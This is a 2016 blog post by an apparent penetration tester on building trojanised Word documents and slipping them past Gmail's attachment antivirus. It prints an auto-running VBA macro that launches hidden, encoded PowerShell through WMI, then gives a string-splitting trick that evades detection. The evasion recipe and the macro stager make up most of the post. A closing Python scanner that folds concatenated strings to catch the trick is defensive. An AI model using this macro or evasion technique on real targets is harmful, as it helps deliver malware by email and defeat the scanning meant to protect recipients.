Note: This was posted in January 2016

My blog has moved: https://vincentyiu.co.uk

So today whilst doing some practice on creating trojanised Microsoft Word documents, I came across an issue. Gmail runs a virus check on attachments by default, which is a problem if you want to send a malicious attachment out.

To insert a payload into the word document, I firstly created a template which looked like the below.

After doing so, creating the macro using AutoOpen and Document_Open was trivial. I made use of a PowerShell one-liner payload along with process creation to launch PowerShell using an encrypted payload. Using PowerShell Empire’s default copy-and-paste macro stager, this is detected.

Sample payload:

Sub AutoOpen()
    Debugging
End Sub

Sub Document_Open()
    Debugging
End Sub

Public Function Debugging() As Variant
    Dim str As String
    ' Command line is assembled piece by piece from string literals
    str = "powershell.exe -NoP -NonI -W Hidden -Enc JAB3AGMAP"
    str = str + "QBOAGUAVwAtAE8AYgBKAGUAQwB0ACAAUwB5AFMAVABlAE0ALgB"

<snip to save space and sensitivity>

    str = str + "ATwBJAG4AJwAnACkA"
    ' Launch the assembled command through WMI with a hidden window
    Const HIDDEN_WINDOW = 0
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objProcess.Create str, Null, objConfig, intProcessID
End Function

What I did was begin removing lines of code and repeatedly upload the document as a Gmail attachment until it was no longer detected as a virus.

I made adjustments to the payload trying to identify which string or pattern the AV was picking up. I quickly realised that it was the fact that the “-Enc” was part of the payload.

To resolve this, I split the “-Enc” string into “-E” and “nc” and then concatenated them back together. For example:

Dim Yops As String

Yops = "powershell.exe -Enc PAYLOADHERE"

This would be translated to the following:

Dim Yops As String

Yops = "powershell.exe -E"

Yops = Yops + "nc PAYLOADHERE"

However, this technique did not work. My next line of thinking was that the “Yops” string is checked at the end, after all the concatenation, to determine whether “-Enc” is followed by “powershell.exe”. Therefore I did the following, and it bypassed the virus checks.

Dim Yops As String

Yops = "powershell.exe -E"

Yolo = "nc PAYLOAD"

Yops = Yops + Yolo + "HERE"

This quickly bypassed the antivirus feature on Gmail’s attachments and I was able to send the payload to my other machine for testing.
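From the detection side, the weakness the post exposes is a scanner that only inspects each string as it is assigned. As an added example (not code from the post), the Python scanner below folds straight-line VBA string assignments and + / & concatenations through intermediate variables, so the split "-E" + "nc" form above resolves back to "-Enc" before the pattern check; the sample macro and its variable names are constructed for the example, and it also treats PowerShell's documented -e and -ec abbreviations as hits.

```python
import re

# Constructed sample: the split-string form from the post, via a second variable.
SAMPLE_MACRO = '''
Dim Yops As String
Yops = "powershell.exe -E"
Yolo = "nc PAYLOAD"
Yops = Yops + Yolo + "HERE"
'''

ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
# A VBA string literal ("" is an escaped quote) or a bare identifier; the
# + and & operators fall between tokens and are simply skipped.
TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|(\w+)')
SWITCH_RE = re.compile(r'(?<!\w)-(\w+)')


def fold_strings(vba_source):
    """Evaluate simple VBA string assignments in order, substituting the
    current value of any referenced variable, and return the final value of
    each variable. Function calls such as Chr() are not evaluated."""
    env = {}
    for line in vba_source.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue  # Dim, Set, Const, method calls: nothing to fold
        name, rhs = m.group(1).lower(), m.group(2)
        parts = []
        for literal, ident in TOKEN_RE.findall(rhs):
            if ident:
                parts.append(env.get(ident.lower(), ''))
            else:
                parts.append(literal.replace('""', '"'))
        env[name] = ''.join(parts)
    return env


def flags_encoded_powershell(command):
    """True if the folded command launches powershell with -EncodedCommand or
    any accepted abbreviation of it (-e, -en, -enc, ..., and -ec)."""
    low = command.lower()
    if 'powershell' not in low:
        return False
    for switch in SWITCH_RE.findall(low):
        if switch == 'ec' or (switch.startswith('e') and 'encodedcommand'.startswith(switch)):
            return True
    return False


def scan_macro(vba_source):
    """Names of variables whose folded value looks like an encoded PowerShell launch."""
    env = fold_strings(vba_source)
    return sorted(n for n, v in env.items() if flags_encoded_powershell(v))
```

Checking only the folded end result is what makes the intermediate-variable trick irrelevant; a scanner that matched each assignment line on its own would see "-E" and "nc" separately and never the joined switch.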
